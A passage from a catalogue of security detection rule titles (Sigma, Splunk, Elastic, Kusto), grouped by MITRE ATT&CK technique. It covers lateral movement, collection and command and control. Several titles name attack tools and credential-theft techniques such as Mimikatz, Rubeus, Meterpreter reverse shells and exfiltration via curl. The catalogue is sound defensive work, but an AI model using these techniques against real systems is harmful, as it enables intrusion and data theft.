- Sigma OpenSSH service activation on Windows experimental
- Sigma Port Forwarding Activity Via SSH.EXE test
- Elastic Potential Remote Desktop Tunneling Detected production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows Protocol Tunneling with Plink production
- Splunk Windows PuTTY Suite Utility Execution production
Remote Services: VNC T1021.005 1 rule
- Sigma Suspicious UltraVNC Execution test
Remote Services: Windows Remote Management T1021.006 31 rules
- Sigma Enable Windows Remote Management test
- Sigma Execute Invoke-command on Remote Host test
- Sigma HackTool - WinRM Access Via Evil-WinRM test
- Splunk Impacket SMBexec (Windows Event Log)
- Elastic Incoming Execution via PowerShell Remoting production
- Elastic Incoming Execution via WinRM Remote Shell production
- Splunk Interactive Session on Remote Endpoint with PowerShell production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential Lateral Movement via Windows Remote Shell experimental
- Sigma Potential Remote PowerShell Session Initiated test
- YARA-L Potential Remote PowerShell Session Initiated
- Splunk Powershell Remote Services Add TrustedHost production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Splunk Remote Process Instantiation via WinRM and PowerShell production
- Splunk Remote Process Instantiation via WinRM and PowerShell Script Block production
- Splunk Remote Process Instantiation via WinRM and Winrs production
- Splunk Windows Remote Host Computer Management Access production
- Splunk Windows Remote Management Execute Shell production
- Sigma WinRM listening service reconnaissance (process) experimental
- Sigma WinRM listening service reconnaissance (WS-Management) experimental
- Kusto WinRM Plugin Lateral Movement
- Splunk WinRM Tools (PowerShell)
- Splunk WinRM Tools (Sysmon)
- Splunk WinRM Tools (Windows Event Log)
- Sigma Winrs Local Command Execution experimental
- Sigma WinRS usage for remote execution
- Elastic WMIC Remote Command production
- Splunk Wsmprovhost LOLBAS Execution Process Spawn production
Remote Services: Cloud Services T1021.007 1 rule
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
Software Deployment Tools T1072 11 rules
- Splunk Detection of tools built by NirSoft experimental
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies available
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies (ASIM Version)
- Sigma PDQ Deploy Remote Adminstartion Tool Execution test
- Elastic Potential WSUS Abuse for Lateral Movement production
- Sigma PUA - Radmin Viewer Utility Execution test
- Splunk Radmin execution (EDR)
- Splunk Radmin execution (Sysmon)
- Splunk Radmin execution (Windows Event Log)
- Sigma Restricted Software Access By SRP test
- Sigma Suspicious Csi.exe Usage test
Taint Shared Content T1080 2 rules
Replication Through Removable Media T1091 8 rules
- Elastic Execution from a Removable Media with Network Connection production
- Sigma External Disk Drive Or USB Storage Device Was Recognized By The System test
- Elastic First Time Seen Removable Device production
- Splunk Removable Media Detected (Windows Event Log)
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows Replication Through Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
Exploitation of Remote Services T1210 27 rules
- Sigma Audit CVE Event test
- Splunk Detect Computer Changed with Anonymous Account production
- Sigma DNS Query Request By QuickAssist.EXE experimental
- Sigma Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC test
- Kusto Gain Code Execution on ADFS Server via Remote WMI Execution
- Kusto Gain Code Execution on ADFS Server via SMB + Remote Service or Scheduled Task available
- Sigma HackTool - SharpWSUS/WSUSpendu Execution test
- Splunk Impacket Lateral Movement Activity (Sysmon)
- Splunk Impacket Lateral Movement Activity (Windows Event Log)
- Elastic Microsoft Exchange Server UM Spawning Suspicious Processes production
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Kusto Oracle suspicious command execution available
- Splunk Potential network connection with CVE-2023-21554 (Sysmon)
- Splunk Potential network connection with CVE-2023-21554 (Windows Event Log)
- Sigma Potential RDP Exploit CVE-2019-0708 test
- Elastic Potential WSUS Abuse for Lateral Movement production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Remote domain controller password reset (Zerologon) experimental
- Sigma Scanner PoC for CVE-2019-0708 RDP RCE Vuln test
- Kusto Service Accounts Performing Remote PS available
- Sigma Suspicious SysAidServer Child test
- Sigma Terminal Service Process Spawn test
- Elastic Unusual Child Process of dns.exe production
- Elastic Unusual File Operation by dns.exe production
- Elastic Unusual Process For MSSQL Service Accounts production
- Sigma WannaCry Ransomware Activity test
- Splunk ZeroLogon CVE-2020-1472 (Windows Event Log)
Use Alternate Authentication Material T1550 29 rules
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma Hacktool Ruler test
- Splunk Kerberos TGT Request Using RC4 Encryption production
- Elastic Kerberos Traffic from Unusual Process production
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Mimikatz Pass-the-hash login experimental
- Splunk Mimikatz PassTheTicket CommandLine Parameters production
- Sigma NTLM Logon test
- Sigma NTLMv1 Logon Between Client and Server test
- Sigma Outgoing Logon with New Credentials test
- Sigma Pass the Hash Activity 2 stable
- Splunk Pass-the-Hash (Windows Event Log)
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Pass-the-Hash (PtH) Attempt production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Kerberos Ticket Exports Through Winlogon Access production
- Sigma Successful Overpass the Hash Attempt test
- Sigma Uncommon Outbound Kerberos Connection test
- Splunk Unknown Process Using The Kerberos Protocol production
- Kusto UnPAC the hash
- Splunk Windows AD Suspicious Attribute Modification production
- Splunk Windows Process With NetExec Command Line Parameters production
- Splunk Windows Steal Authentication Certificates - ESC1 Authentication production
Use Alternate Authentication Material: Pass the Hash T1550.002 13 rules
- Sigma Hacktool Ruler test
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Mimikatz Pass-the-hash login experimental
- Sigma NTLM Logon test
- Sigma NTLMv1 Logon Between Client and Server test
- Sigma Pass the Hash Activity 2 stable
- Splunk Pass-the-Hash (Windows Event Log)
- Elastic Potential Pass-the-Hash (PtH) Attempt production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Successful Overpass the Hash Attempt test
Use Alternate Authentication Material: Pass the Ticket T1550.003 10 rules
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Elastic Kerberos Traffic from Unusual Process production
- Splunk Mimikatz PassTheTicket CommandLine Parameters production
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Kerberos Ticket Exports Through Winlogon Access production
- Sigma Uncommon Outbound Kerberos Connection test
- Kusto UnPAC the hash
- Splunk Windows Process With NetExec Command Line Parameters production
Remote Service Session Hijacking T1563 8 rules
- Sigma Potential MSTSC Shadowing Activity test
- Elastic Potential Remote Desktop Shadowing Activity production
- Splunk RDP Hijacking (Windows Event Log)
- Sigma RDP session hijack via service creation abuse experimental
- Sigma RDP session hijack via TSCON abuse command experimental
- Sigma Suspicious RDP Redirect Using TSCON test
- Splunk Windows RDP Connection Successful production
- Splunk Windows Service Create with Tscon production
Remote Service Session Hijacking: RDP Hijacking T1563.002 8 rules
- Sigma Potential MSTSC Shadowing Activity test
- Elastic Potential Remote Desktop Shadowing Activity production
- Splunk RDP Hijacking (Windows Event Log)
- Sigma RDP session hijack via service creation abuse experimental
- Sigma RDP session hijack via TSCON abuse command experimental
- Sigma Suspicious RDP Redirect Using TSCON test
- Splunk Windows RDP Connection Successful production
- Splunk Windows Service Create with Tscon production
Lateral Tool Transfer T1570 33 rules
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Elastic Execution via TSClient Mountpoint production
- Kusto Identify Mango Sandstorm powershell commands
- Elastic Lateral Movement via Startup Folder production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- YARA-L MITRE ATT&CK T1570 Suspicious Command PSExec
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies available
- Kusto New EXE deployed via Default Domain or Default Domain Controller Policies (ASIM Version)
- Elastic Potential Lateral Tool Transfer via SMB Share production
- Elastic Potential Ransomware Behavior - Note Files by System production
- Sigma Potentially Suspicious File Creation by OpenEDR's ITSMService experimental
- Elastic PsExec Network Connection production
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote Execution via File Shares production
- Elastic Remote File Copy to a Hidden Share production
- Kusto Remote File Creation with PsExec available
- Sigma Rundll32 Execution Without Parameters test
- Elastic Scheduled Task Execution at Scale via GPO production
- Sigma SMB over QUIC Via Net.EXE test
- Sigma SMB over QUIC Via PowerShell Script test
- Elastic Suspicious Execution from a WebDav Share production
Collection
Data from Local System T1005 26 rules
- Elastic Accessing Outlook Data Files production
- Kusto AD FS Remote Auth Sync Connection available
- Kusto AD FS Remote HTTP Network Connection available
- Kusto ADFS Database Named Pipe Connection available
- Sigma ADFS Database Named Pipe Connection By Uncommon Tool test
- Kusto ADFS DKM Master Key Export
- Elastic Attempted Private Key Access production
- Sigma Crash Dump Created By Operating System experimental
- Kusto Deimos Component Execution available
- Elastic Encrypting Files with WinRar or 7z production
- Sigma Esentutl Steals Browser Information test
- Splunk Esentutl.exe Collecting Browser Data (Sysmon)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Kusto Microsoft Entra ID Health Monitoring Agent Registry Keys Access
- Kusto Microsoft Entra ID Health Service Agents Registry Keys Access
- Sigma Potential Conti Ransomware Database Dumping Activity Via SQLCmd test
- Sigma Script Interpreter Spawning Credential Scanner - Windows experimental
- Sigma Shai-Hulud NPM Package Malicious Exfiltration via Curl experimental
- Sigma SQLite Chromium Profile Data DB Access test
- Sigma SQLite Firefox Profile Data DB Access test
- Splunk Sqlite Module In Temp Folder production
- Sigma Veeam Backup Database Suspicious Query test
- Sigma VeeamBackup Database Credentials Dump Via Sqlcmd.EXE test
- Splunk Windows Copy Files (PowerShell)
- Splunk Windows Copy Files (Sysmon)
- Splunk Windows Copy Files (Windows Event Log)
Data from Removable Media T1025 4 rules
- Splunk Removable Media Detected (Windows Event Log)
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
Data from Network Shared Drive T1039 9 rules
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- Kusto Excessive share permissions available
- Elastic Potential Network Share Discovery production
- Sigma Suspicious Access to Sensitive File Extensions test
- Splunk Windows Copy Files (PowerShell)
- Splunk Windows Copy Files (Sysmon)
- Splunk Windows Copy Files (Windows Event Log)
- Elastic Windows Network Enumeration production
- Splunk Windows Network Share Interaction Via Net production
Input Capture T1056 10 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma DNS Query Request To OneLaunch Update Service test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Keylogging T1056.001 3 rules
- Sigma Potential Keylogger Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Keylogging test
Input Capture: GUI Input Capture T1056.002 3 rules
- Sigma CredUI.DLL Loaded By Uncommon Process test
- Sigma PUA - Mouse Lock Execution test
- Splunk Windows Input Capture Using Credential UI Dll production
Input Capture: Credential API Hooking T1056.004 4 rules
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Data Staged T1074 17 rules
- Splunk Command Output Redirected to Localhost (Windows Event Log)
- Splunk Data Staged to File (PowerShell)
- Splunk Data Staged to File (Sysmon)
- Splunk Data Staged to File (Windows Event Log)
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet test
- Splunk Native Archive Commands (PowerShell)
- Splunk Native Archive Commands (Sysmon)
- Splunk Native Archive Commands (Windows Event Log)
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Elastic Remote File Copy to a Hidden Share production
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Splunk Suspicious SQLite3 LSQuarantine Behavior experimental
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Module test
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Script test
Data Staged: Local Data Staging T1074.001 14 rules
- Splunk Data Staged to File (PowerShell)
- Splunk Data Staged to File (Sysmon)
- Splunk Data Staged to File (Windows Event Log)
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet test
- Splunk Native Archive Commands (PowerShell)
- Splunk Native Archive Commands (Sysmon)
- Splunk Native Archive Commands (Windows Event Log)
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Module test
- Sigma Zip A Folder With PowerShell For Staging In Temp - PowerShell Script test
Data Staged: Remote Data Staging T1074.002 1 rule
- Elastic Remote File Copy to a Hidden Share production
Screen Capture T1113 18 rules
- Splunk NirCmd Execution (Sysmon)
- Splunk NirCmd Execution (Windows Event Log)
- Sigma Periodic Backup For System Registry Hives Enabled test
- Elastic Potential Remote Desktop Shadowing Activity production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Splunk Remcos RAT File Creation in Remcos Folder production
- Sigma Screen Capture Activity Via Psr.EXE test
- Splunk Suspicious Image Creation In Appdata Folder production
- Splunk Suspicious WAV file in Appdata Folder production
- Sigma System Drawing DLL Load test
- Sigma Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted test
- Sigma Windows Recall Feature Enabled - Registry test
- Sigma Windows Recall Feature Enabled Via Reg.EXE test
- Splunk Windows Screen Capture in TEMP folder production
- Splunk Windows Screen Capture Via Powershell production
- Sigma Windows Screen Capture with CopyFromScreen test
Email Collection T1114 13 rules
- Elastic Accessing Outlook Data Files production
- Splunk Email files written outside of the Outlook directory experimental
- Splunk Exchange New Export Request (PowerShell)
- Sigma Exchange PowerShell Snap-Ins Usage test
- Elastic Exporting Exchange Mailbox via PowerShell production
- Sigma Hacktool Ruler test
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
- Splunk Mailsniper Invoke functions production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Local Email Collection test
- Elastic Suspicious Inter-Process Communication via Outlook production
Email Collection: Local Email Collection T1114.001 8 rules
- Elastic Accessing Outlook Data Files production
- Splunk Email files written outside of the Outlook directory experimental
- Splunk Exchange New Export Request (PowerShell)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Splunk Mailsniper Invoke functions production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Local Email Collection test
- Elastic Suspicious Inter-Process Communication via Outlook production
Email Collection: Remote Email Collection T1114.002 3 rules
- Splunk Exchange New Export Request (PowerShell)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
Email Collection: Email Forwarding Rule T1114.003 2 rules
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
Clipboard Data T1115 9 rules
- Sigma Clipboard Data Collection Via Pbpaste test
- Sigma Data Copied To Clipboard Via Clip.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get Clipboard test
- Sigma PowerShell Get-Clipboard Cmdlet Via CLI test
- Splunk Suspicious PowerShell Clipboard Activity (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (Sysmon)
- Splunk Suspicious PowerShell Clipboard Activity (Windows Event Log)
- Splunk Windows ClipBoard Data via Get-ClipBoard production
Automated Collection T1119 16 rules
- Kusto ADWS Connection from Process Injection Target
- Kusto ADWS Connection from Unexpected Binary
- Sigma Automated Collection Command PowerShell test
- Sigma Automated Collection Command Prompt test
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto Large number of AD objects accessed by user
- Sigma Recon Information for Export with Command Prompt test
- Sigma Recon Information for Export with PowerShell test
- Sigma Shai-Hulud Malicious GitHub Workflow Creation experimental
- Splunk Windows File Collection Via Copy Utilities production
- Splunk Windows Process Accessing Windows Recall Directory production
Audio Capture T1123 4 rules
- Sigma Audio Capture via PowerShell test
- Sigma Audio Capture via SoundRecorder test
- Sigma Processes Accessing the Microphone and Webcam test
- Sigma Suspicious Camera and Microphone Access test
Video Capture T1125 4 rules
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Sigma Suspicious Camera and Microphone Access test
Browser Session Hijacking T1185 11 rules
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma Browser Started with Remote Debugging test
- Splunk Browser Started with Remote Debugging - Windows (PowerShell)
- Splunk Browser Started with Remote Debugging - Windows (Sysmon)
- Splunk Browser Started with Remote Debugging - Windows (Windows Event Log)
- Sigma Potential Data Stealing Via Chromium Headless Debugging test
- Splunk Windows Browser Process Launched with Unusual Flags production
- Splunk Windows Chrome Auto-Update Disabled via Registry production
- Splunk Windows Chrome Enable Extension Loading via Command-Line production
- Splunk Windows Chrome Extension Allowed Registry Modification production
- Splunk Windows Chromium Process Loaded Extension via Command-Line production
Data from Information Repositories T1213 2 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Elastic Potential Veeam Credential Access Command production
Adversary-in-the-Middle T1557 37 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Elastic Creation or Modification of Root Certificate production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Elastic DNS Global Query Block List Modified or Disabled production
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma ISATAP Router Address Was Set experimental
- Sigma Local Privilege Escalation Indicator TabTip test
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Kusto NTLM Relay Attack
- Elastic Potential ADIDNS Poisoning via Wildcard Record Creation production
- Elastic Potential Computer Account NTLM Relay Activity production
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Local NTLM Relay via HTTP production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Potential WPAD Spoofing via DNS Record Creation production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Elastic Service Creation via Local Kerberos Authentication production
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: Name Resolution Poisoning and SMB Relay T1557.001 25 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma Local Privilege Escalation Indicator TabTip test
- Kusto NTLM Relay Attack
- Elastic Potential Computer Account NTLM Relay Activity production
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: DHCP Spoofing T1557.003 1 rule
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
Archive Collected Data T1560 34 rules
- Splunk 7zip CommandLine To SMB Share Path production
- Sigma 7Zip Compressing Dump Files test
- Splunk Anomalous usage of 7zip production
- Sigma APT31 Judgement Panda Activity test
- Sigma Compress Data and Lock With Password for Exfiltration With 7-ZIP test
- Sigma Compress Data and Lock With Password for Exfiltration With WINZIP test
- Sigma Compress-Archive Cmdlet Execution test
- Sigma Compressed File Creation Via Tar.EXE test
- Sigma Compressed File Extraction Via Tar.EXE test
- Elastic Compression DLL Loaded by Unusual Process production
- Sigma Conti NTDS Exfiltration Command test
- Splunk Detect Certipy File Modifications production
- Splunk Detect Renamed 7-Zip production
- Splunk Detect Renamed WinRAR production
- Elastic Encrypting Files with WinRar or 7z production
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Files Added To An Archive Using Rar.EXE test
- Splunk IcedID Exfiltrated Archived File Creation production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Splunk Native Archive Commands (PowerShell)
- Splunk Native Archive Commands (Sysmon)
- Splunk Native Archive Commands (Windows Event Log)
- Sigma Password Protected Compressed File Extraction Via 7Zip test
- Sigma Potentially Suspicious Compression Tool Parameters test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Rar Usage with Password and Compression Level test
- Sigma Suspicious Manipulation Of Default Accounts Via Net.EXE test
- Splunk Utility Archive Data (PowerShell)
- Splunk Utility Archive Data (Windows Event Log)
- Splunk Windows Archive Collected Data via Powershell production
- Splunk Windows Archive Collected Data via Rar production
- Splunk Windows Archived Collected Data In TEMP Folder production
- Sigma Winrar Compressing Dump Files test
- Sigma WinRAR Execution in Non-Standard Folder test
Archive Collected Data: Archive via Utility T1560.001 24 rules
- Splunk 7zip CommandLine To SMB Share Path production
- Sigma 7Zip Compressing Dump Files test
- Splunk Anomalous usage of 7zip production
- Sigma APT31 Judgement Panda Activity test
- Sigma Compress Data and Lock With Password for Exfiltration With 7-ZIP test
- Sigma Compress Data and Lock With Password for Exfiltration With WINZIP test
- Sigma Compressed File Creation Via Tar.EXE test
- Sigma Compressed File Extraction Via Tar.EXE test
- Splunk Detect Renamed 7-Zip production
- Splunk Detect Renamed WinRAR production
- Elastic Encrypting Files with WinRar or 7z production
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Files Added To An Archive Using Rar.EXE test
- Splunk IcedID Exfiltrated Archived File Creation production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma Password Protected Compressed File Extraction Via 7Zip test
- Sigma Potentially Suspicious Compression Tool Parameters test
- Sigma Rar Usage with Password and Compression Level test
- Sigma Suspicious Manipulation Of Default Accounts Via Net.EXE test
- Splunk Utility Archive Data (PowerShell)
- Splunk Utility Archive Data (Windows Event Log)
- Splunk Windows Archive Collected Data via Rar production
- Sigma Winrar Compressing Dump Files test
- Sigma WinRAR Execution in Non-Standard Folder test
Archive Collected Data: Archive via Library T1560.002 1 rule
- Elastic Compression DLL Loaded by Unusual Process production
Command & Control
Data Obfuscation T1001 5 rules
- Sigma ADSI-Cache File Creation By Uncommon Tool test
- Splunk Obfuscated Powershell Techniques (PowerShell)
- Sigma Suspicious LDAP-Attributes Used test
- Splunk Windows PowGoop Beacon Decoding production
- Splunk Windows Suspicious QEMU Execution production
Data Obfuscation: Protocol or Service Impersonation T1001.003 2 rules
- Sigma ADSI-Cache File Creation By Uncommon Tool test
- Sigma Suspicious LDAP-Attributes Used test
Fallback Channels T1008 9 rules
- Kusto Detect DNS queries reporting multiple errors from different clients - Static threshold based (ASIM DNS Solution) available
- Kusto Detect excessive NXDOMAIN DNS queries - Static threshold based (ASIM DNS Solution) available
- Kusto Excessive NXDOMAIN DNS Queries (ASIM DNS Schema)
- Sigma New Outlook Macro Created test
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Kusto Potential DGA(Domain Generation Algorithm) detected via Repetitive Failures - Static threshold based (ASIM DNS Solution) available
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Suspicious Outlook Macro Created test
- Splunk Windows Outlook Macro Security Modified production
Application Layer Protocol T1071 78 rules
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma Change User Agents with WebRequest test
- Sigma Cloudflared Tunnels Related DNS Requests test
- Splunk Command and Control Detection (Windows Event Log)
- Elastic Connection to Commonly Abused Web Services production
- Sigma Curl.EXE Execution With Custom UserAgent test
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Splunk DNS Kerberos Coercion production
- Sigma DNS Query by Finger Utility experimental
- Sigma DNS Query Request By QuickAssist.EXE experimental
- Sigma DNS Query To Common Malware Hosting and Shortener Services experimental
- Sigma DNS Query To Devtunnels Domain test
- Sigma DNS Query To Katz Stealer Domains experimental
- Sigma DNS Query To Visual Studio Code Tunnels Domain test
- Sigma DoT (DNS over TLS) activation (command) stable
- Sigma DoT (DNS over TLS) activation (PowerShell) experimental
- Sigma GALLIUM IOCs test
- Sigma Github Self-Hosted Runner Execution test
- Kusto Google Threat Intelligence - Threat Hunting Domain
- Kusto Google Threat Intelligence - Threat Hunting IP
- Sigma HackTool - SILENTTRINITY Stager DLL Load test
- Sigma HackTool - SILENTTRINITY Stager Execution test
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Elastic MsBuild Making Network Connections production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Network Connection Initiated via Finger.EXE experimental
- Elastic Network Connection via Compiled HTML File production
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Outbound Network Connection Initiated By Microsoft Dialer test
- Elastic Outlook Home Page Registry Modification production
- Kusto Potential beaconing activity (ASIM Network Session schema) available
- Elastic Potential Command and Control via Internet Explorer production
- Elastic Potential DNS Tunneling via NsLookup production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Sigma Potentially Suspicious Rundll32.EXE Execution of UDL File test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Renamed Visual Studio Code Tunnel Execution test
- Sigma Silence.EDA Detection test
- Sigma Suspicious Cobalt Strike DNS Beaconing - DNS Client test
- Sigma Suspicious Cobalt Strike DNS Beaconing - Sysmon test
- Elastic Suspicious Command Prompt Network Connection production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic System Public IP Discovery via DNS Query production
- Sigma Tunneling Tool Execution test
